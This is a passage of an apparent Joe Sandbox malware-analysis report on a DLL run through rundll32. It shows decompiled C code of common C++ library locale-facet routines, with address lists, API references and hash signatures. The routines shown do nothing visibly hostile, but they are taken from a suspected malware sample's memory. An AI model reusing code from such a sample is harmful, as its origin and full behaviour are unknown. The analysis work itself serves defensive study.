						_t143 = _t147;
						goto L5;
					}
				}
			}















                          0x6e20fb3d
                          0x6e20fb3d
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb6e
                          0x6e20fb73
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FB44
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FB4E
                          • int.LIBCPMT ref: 6E20FB65
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FB9F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FBBF
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FBDD
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
                          • Instruction ID: 78c16c7cfdeef293c5514b18c1c363ef952ffcb74cea5a6842a6c889fabdd728
                          • Opcode Fuzzy Hash: f50bdd13fb5bdfe652d8237c1e4b6903938cda211a126a7cd3015429943347f3
                          • Instruction Fuzzy Hash: 5611067690051E9BCF04DBE4C898AEEB77BAF48B14F240909E511AB2D0DBB49A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20FBE3, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E6E20FBE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t110 - 0x14, 0);
				_t105 =  *0x6e2c6e00; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1E161C(0x6e2c6dac);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E2066BA(_t110 - 0x14);
					return E6E220075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E2115C4(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t110 - 0x20);
							E6E223D74(_t110 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t102, _t105, 0x14);
							E6E206653(_t110 - 0x14, 0);
							_t106 =  *0x6e2c6dd0; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1E161C(0x6e2c6d60);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E2066BA(_t110 - 0x14);
								return E6E220075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E21162A(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1E1438(_t93);
										E6E223D74(_t110 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e26851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e26c0c4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E21542F(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E220075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E206FD3(__eflags, _t103);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e2c6dd0 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E206FD3(__eflags, _t102);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e2c6e00 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}












                          0x6e20fbe3
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc14
                          0x6e20fc19
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20FBEA
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20FBF4
                          • int.LIBCPMT ref: 6E20FC0B
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20FC45
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FC65
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20FC83
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
                          • Instruction ID: d1e7b642812f5fe2d79606500f628ac9fe5a98729226613b93c8deb2ffc433f1
                          • Opcode Fuzzy Hash: 5a8849c5b38dbda1ca21755790ce879d6de7a6c93fadb102331029b3e8d33d06
                          • Instruction Fuzzy Hash: 9311067590051D9BCF40DBE0C894EEEB77BBF44B14F240909E8106B2D0DFB49A44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B898, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B898(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t286 - 0x14, 0);
				_t273 =  *0x6e2c6e30; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6E1E161C(0x6e2c6e10);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6E2066BA(_t286 - 0x14);
					return E6E220075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6E21C050(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t286 - 0x20);
							E6E223D74(_t286 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t266, _t273, 0x14);
							E6E206653(_t286 - 0x14, 0);
							_t274 =  *0x6e2c6e34; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6E1E161C(0x6e2c6e14);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6E2066BA(_t286 - 0x14);
								return E6E220075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6E21C0B8(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t286 - 0x20);
										E6E223D74(_t286 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t203, _t267, _t274, 0x14);
										E6E206653(_t286 - 0x14, 0);
										_t275 =  *0x6e2c6e3c; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6E1E161C(0x6e2c6e1c);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6E2066BA(_t286 - 0x14);
											return E6E220075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6E21C120(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t286 - 0x20);
													E6E223D74(_t286 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t203, _t268, _t275, 0x14);
													E6E206653(_t286 - 0x14, 0);
													_t276 =  *0x6e2c6e38; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6E1E161C(0x6e2c6e18);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6E2066BA(_t286 - 0x14);
														return E6E220075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6E21C1A4(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t286 - 0x20);
																E6E223D74(_t286 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t203, _t269, _t276, 0x14);
																E6E206653(_t286 - 0x14, 0);
																_t277 =  *0x6e2c6e40; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6E1E161C(0x6e2c6e20);
																_t234 =  *((intOrPtr*)(_t286 + 8));
																_t270 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t149);
																__eflags = _t270;
																if(_t270 != 0) {
																	L33:
																	E6E2066BA(_t286 - 0x14);
																	return E6E220075(_t270);
																} else {
																	__eflags = _t277;
																	if(_t277 == 0) {
																		_push( *((intOrPtr*)(_t286 + 8)));
																		_push(_t286 - 0x10);
																		__eflags = E6E21C229(_t203, _t234, _t264, _t270, _t277) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t286 - 0x20);
																			E6E223D74(_t286 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t203, _t270, _t277, 0x14);
																			E6E206653(_t286 - 0x14, 0);
																			_t278 =  *0x6e2c6e44; // 0x0
																			 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																			 *(_t286 - 0x10) = _t278;
																			_t162 = E6E1E161C(0x6e2c6e24);
																			_t241 =  *((intOrPtr*)(_t286 + 8));
																			_t271 = E6E1E171B( *((intOrPtr*)(_t286 + 8)), _t162);
																			__eflags = _t271;
																			if(_t271 != 0) {
																				L40:
																				E6E2066BA(_t286 - 0x14);
																				return E6E220075(_t271);
																			} else {
																				__eflags = _t278;
																				if(_t278 == 0) {
																					_push( *((intOrPtr*)(_t286 + 8)));
																					_push(_t286 - 0x10);
																					__eflags = E6E21C295(_t203, _t241, _t264, _t271, _t278) - 0xffffffff;
																					if(__eflags == 0) {
																						_t245 = _t286 - 0x20;
																						E6E1E1438(_t245);
																						E6E223D74(_t286 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e26851f, _t203, _t271, _t278, 4);
																						_t279 = _t245;
																						 *(_t286 - 0x10) = _t279;
																						 *((intOrPtr*)(_t279 + 4)) =  *((intOrPtr*)(_t286 + 0xc));
																						_push( *((intOrPtr*)(_t286 + 0x14)));
																						_t91 = _t286 - 4;
																						 *_t91 =  *(_t286 - 4) & 0x00000000;
																						__eflags =  *_t91;
																						 *_t279 = 0x6e26c414;
																						 *((char*)(_t279 + 0x28)) =  *((intOrPtr*)(_t286 + 0x10));
																						E6E21D028(_t203, _t245, _t264, _t271, _t279,  *_t91);
																						return E6E220075(_t279,  *((intOrPtr*)(_t286 + 8)));
																					} else {
																						_t271 =  *(_t286 - 0x10);
																						 *(_t286 - 0x10) = _t271;
																						 *(_t286 - 4) = 1;
																						E6E206FD3(__eflags, _t271);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
																						 *0x6e2c6e44 = _t271;
																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E206FD3(__eflags, _t270);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e2c6e40 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E206FD3(__eflags, _t269);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e2c6e38 = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E206FD3(__eflags, _t268);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e2c6e3c = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E206FD3(__eflags, _t267);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e2c6e34 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E206FD3(__eflags, _t266);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e2c6e30 = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}
























                          0x6e21b898
                          0x6e21b898
                          0x6e21b89f
                          0x6e21b8a9
                          0x6e21b8ae
                          0x6e21b8b9
                          0x6e21b8bd
                          0x6e21b8c0
                          0x6e21b8c5
                          0x6e21b8c9
                          0x6e21b8ce
                          0x6e21b8d2
                          0x6e21b917
                          0x6e21b91a
                          0x6e21b926
                          0x6e21b8d4
                          0x6e21b8d6
                          0x6e21b8dc
                          0x6e21b8e2
                          0x6e21b8ea
                          0x6e21b8ed
                          0x6e21b92a
                          0x6e21b938
                          0x6e21b93d
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b974
                          0x6e21b976
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c
                          0x6e21b8ef
                          0x6e21b8ef
                          0x6e21b8f2
                          0x6e21b8f6
                          0x6e21b8fa
                          0x6e21b907
                          0x6e21b90f
                          0x6e21b911
                          0x00000000
                          0x6e21b911
                          0x6e21b8d8
                          0x6e21b8d8
                          0x00000000
                          0x6e21b8d8
                          0x6e21b8d6

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B89F
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B8A9
                          • int.LIBCPMT ref: 6E21B8C0
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21B8FA
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B91A
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B938
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
                          • Instruction ID: d08d6b302eae1b797f4fb565c8de8d8823559af4b1c173fd64c924e421521c79
                          • Opcode Fuzzy Hash: 5141e150c987f14687410213f946ae7ab3c68ea652f40b7dca6d7c74b60acb0f
                          • Instruction Fuzzy Hash: B811CE7991451ECBCF04DBE0C894AEDB7BBBF44B14F140919E510AB390DBB89E41CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B93E, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B93E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
